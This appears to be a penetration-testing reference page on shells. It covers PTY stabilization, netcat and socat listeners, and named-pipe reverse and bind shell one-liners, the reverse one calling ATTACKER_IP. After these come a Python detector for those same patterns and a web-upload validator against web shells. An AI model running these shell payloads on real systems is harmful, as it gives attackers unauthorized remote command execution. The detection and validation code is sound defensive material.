Shell
A shell is a command-line interface that allows users to interact with an operating system by executing commands. It provides a text-based environment where users can manage files, execute programs, and automate tasks through scripting. Some common shell environments include Bash, Zsh, and PowerShell.
Shell Stabilization
When working with an unstable or limited shell in a penetration testing scenario, stabilization techniques improve usability by enabling features like tab autocomplete and signal handling.
Spawn a Bash Shell
To upgrade a limited shell to a fully interactive Bash shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Set Terminal
Some shells may not recognize the terminal type. Setting it to xterm ensures better compatibility:
export TERM=xterm
Suspend Process and Bring to Foreground
If a shell does not properly handle terminal controls, press Ctrl+Z to suspend the process, then run the following in your local terminal:
stty raw -echo; fg
This step improves the shell experience by enabling features like tab autocomplete, arrow keys, and Ctrl+C to kill processes.
Listeners
Listeners are used to capture incoming shell connections.
Netcat (nc)
Basic Listener
nc -nlvp <PORT>
Enhanced Shell with Rlwrap
rlwrap nc -lvnp 443
rlwrap wraps nc with readline, adding line editing and command history for better usability.
Socat
| Functionality | Command | Description |
|---|---|---|
| Simple Listener | `socat -d -d TCP-LISTEN:443 STDOUT` | Listens for incoming TCP connections. |
| Connect to Remote Port | `socat TCP:<IP>:<PORT> -` | Connects to a remote host and port. |
| Secure Connection (SSL) | `socat stdio SSL:<IP>:<PORT>,cert=<CERT>,key=<KEY>,verify=0` | Establishes an encrypted connection; `verify=0` disables certificate verification. |
Reverse Shell
Allows remote command execution by connecting the target back to the attacker.
Listener
nc -lvnp 443
Payload
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc ATTACKER_IP ATTACKER_PORT >/tmp/f
Bind Shell
A bind shell opens a specific port on the target for the attacker to connect to. Bind shells are less common than reverse shells because the open listening port is easier to detect.
Listener
nc -nv TARGET_IP 8080
Payload
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc -l 0.0.0.0 8080 > /tmp/f
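The stabilization step, the listeners and the two named-pipe payloads above are also the signatures a defender hunts for in process-execution telemetry. The following is an added example, not part of the original page: a small Python detector run over a constructed feed of `pid user cmdline` records (made up here; the real source would be auditd EXECVE or EDR process events) that flags the `pty.spawn` upgrade, the `mkfifo`-based reverse and bind shells, and `nc -l` / `socat *-LISTEN` listeners, telling bind from reverse by whether the network tool is listening.

```python
"""Detect the shell-stabilisation, listener and named-pipe shell patterns
described on this page in process-execution records.
Added example: the "pid user cmdline" format and every SAMPLE_FEED line are
constructed for illustration, not real auditd/EDR output."""
import re
import shlex
from typing import Iterable, List, NamedTuple

NETCAT = {"nc", "ncat", "netcat"}
SHELLS = {"sh", "bash", "dash", "zsh"}
SEPARATORS = {"|", ";", "&&", "||", ">", ">>", "<", "&"}
PTY_SPAWN_RE = re.compile(r"pty\.spawn\(")
SOCAT_LISTEN_RE = re.compile(r"^(TCP[46]?|OPENSSL|SSL)-LISTEN:")

# Constructed sample feed (not real logs). 1202/1203 mirror the reverse and
# bind payloads above; 1204, 1206 and 1207 are benign noise.
SAMPLE_FEED = [
    """1201 www-data python3 -c 'import pty;pty.spawn("/bin/bash")'""",
    "1202 www-data sh -c 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 203.0.113.5 443 >/tmp/f'",
    "1203 www-data sh -c 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc -l 0.0.0.0 8080 > /tmp/f'",
    "1204 alice python3 manage.py runserver",
    "1205 bob socat -d -d TCP-LISTEN:443 STDOUT",
    "1206 bob nc -zv db.internal 5432",
    "1207 carol ssh deploy@web01",
]


class Finding(NamedTuple):
    pid: int
    user: str
    rule: str
    detail: str


def _base(tok: str) -> str:
    return tok.rsplit("/", 1)[-1]


def flatten(cmdline: str) -> List[str]:
    """Split a command line into words, re-splitting quoted sub-commands (the
    string handed to `sh -c`) so the pipeline inside them becomes visible."""
    try:
        words = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a naive split
        words = cmdline.split()
    out: List[str] = []
    for w in words:
        out.extend(flatten(w) if " " in w else [w])
    return out


def _args_after(tokens: List[str], names):
    """For each token naming one of `names`, yield its arguments up to the next
    shell separator, so flags of later pipeline stages are not attributed to it."""
    for i, tok in enumerate(tokens):
        if _base(tok) in names:
            args: List[str] = []
            for t in tokens[i + 1:]:
                if t in SEPARATORS:
                    break
                args.append(t.rstrip(";"))
                if t.endswith(";"):
                    break
            yield args


def netcat_listens(tokens: List[str]) -> bool:
    """True when nc/ncat is given -l (bind-shell style listener)."""
    return any(a == "--listen" or (a.startswith("-") and not a.startswith("--") and "l" in a[1:])
               for args in _args_after(tokens, NETCAT) for a in args)


def socat_listens(tokens: List[str]) -> bool:
    return any(SOCAT_LISTEN_RE.match(a) for args in _args_after(tokens, {"socat"}) for a in args)


def interactive_shell(tokens: List[str]) -> bool:
    """True when a shell is started with -i (the `sh -i` stage of the payloads)."""
    return any(_base(t) in SHELLS and tokens[i + 1:i + 2] == ["-i"] for i, t in enumerate(tokens))


def scan_record(pid: int, user: str, cmdline: str) -> List[Finding]:
    tokens = flatten(cmdline)
    found: List[Finding] = []
    if PTY_SPAWN_RE.search(cmdline):
        found.append(Finding(pid, user, "pty_spawn", "script upgrading to an interactive PTY"))
    has_fifo = any(_base(t) == "mkfifo" for t in tokens)
    has_net = any(_base(t) in NETCAT | {"socat"} for t in tokens)
    if has_fifo and has_net and interactive_shell(tokens):
        bound = netcat_listens(tokens) or socat_listens(tokens)
        found.append(Finding(pid, user, "fifo_bind_shell" if bound else "fifo_reverse_shell",
                             "named pipe wired between an interactive shell and a network tool"))
    if netcat_listens(tokens):
        found.append(Finding(pid, user, "netcat_listener", "nc started with -l"))
    if socat_listens(tokens):
        found.append(Finding(pid, user, "socat_listener", "socat listening address"))
    return found


def scan_feed(lines: Iterable[str]) -> List[Finding]:
    """Parse "pid user cmdline" records and return every finding."""
    findings: List[Finding] = []
    for line in lines:
        pid, user, cmdline = line.split(" ", 2)
        findings.extend(scan_record(int(pid), user, cmdline))
    return findings


if __name__ == "__main__":
    for f in scan_feed(SAMPLE_FEED):
        print(f"pid={f.pid} user={f.user} rule={f.rule}: {f.detail}")
```

Running the file prints one line per finding. The rules only see what the exec source records, so the `pty.spawn` rule depends on the interpreter's argument string being logged, and `nc -l` fires on legitimate admin use too; in practice the user field (a web service account spawning an interactive shell) is what turns a hit into an alert.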
Web Shell
A web shell is a malicious script uploaded to a vulnerable web application to gain unauthorized access to the server. Attackers use web shells to execute arbitrary commands, manipulate files, or pivot deeper into a network.
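As an added defender-side example (not from the original page), this Python upload validator implements the checks that keep an upload endpoint from becoming the entry point the paragraph describes: path stripping, an extension allowlist with double-extension rejection, a file-signature check, a scan for script openers, and storage under a server-chosen random name. The allowed types, the size limit and the random-name policy are assumptions chosen for illustration.

```python
"""Reject uploads that could be executed server-side as a web shell.
Added example, not the page's or any project's code. The allowed types, size
limit and random-name storage policy are assumptions made for illustration."""
import os
import secrets
from typing import NamedTuple, Optional

# Allowed extensions and the file signature (magic bytes) each must start with.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
# Extensions a web server or handler may execute. None may appear anywhere in
# the name, so "x.php.png" (double extension) is rejected along with "x.phtml".
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps",
                   "jsp", "jspx", "asp", "aspx", "ashx", "cgi", "pl", "py", "sh", "htaccess"}
# Script openers that have no business inside an image or PDF.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"#!")
MAX_BYTES = 5 * 1024 * 1024  # assumed size limit


class UploadDecision(NamedTuple):
    accepted: bool
    reason: str
    stored_name: Optional[str]  # server-chosen name when accepted


def validate_upload(client_name: str, content: bytes) -> UploadDecision:
    """Apply path, allowlist, double-extension, size, signature and marker checks."""
    # Never trust the client's path: keep only the final component.
    name = os.path.basename(client_name.replace("\\", "/"))
    parts = [p.lower() for p in name.split(".") if p]
    if len(parts) < 2:
        return UploadDecision(False, "no extension", None)
    if any(p in EXECUTABLE_EXTS for p in parts[1:]):
        return UploadDecision(False, "executable extension in name", None)
    ext = parts[-1]
    if ext not in ALLOWED:
        return UploadDecision(False, f"extension .{ext} not allowed", None)
    if len(content) > MAX_BYTES:
        return UploadDecision(False, "too large", None)
    if not content.startswith(ALLOWED[ext]):  # startswith accepts a tuple of prefixes
        return UploadDecision(False, "content does not match declared type", None)
    if any(marker in content for marker in SCRIPT_MARKERS):
        return UploadDecision(False, "script marker embedded in file", None)
    # Store under a random name the client cannot influence; keep the original
    # name as metadata only, never as a path.
    return UploadDecision(True, "ok", f"{secrets.token_hex(16)}.{ext}")


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32  # constructed minimal PNG header
    for name, data in [("avatar.png", png), ("avatar.php.png", png),
                       ("../../var/www/html/a.png", png), ("fake.png", b"<?php echo 1; ?>")]:
        print(name, "->", validate_upload(name, data))
```

The validator narrows the attack surface but does not prove a file harmless (the marker scan can miss obfuscated content and can false-positive on legitimate files containing those bytes). The decisive control is to store uploads outside the web root, or in a location where the server executes nothing, and serve them through a handler that sets a fixed content type.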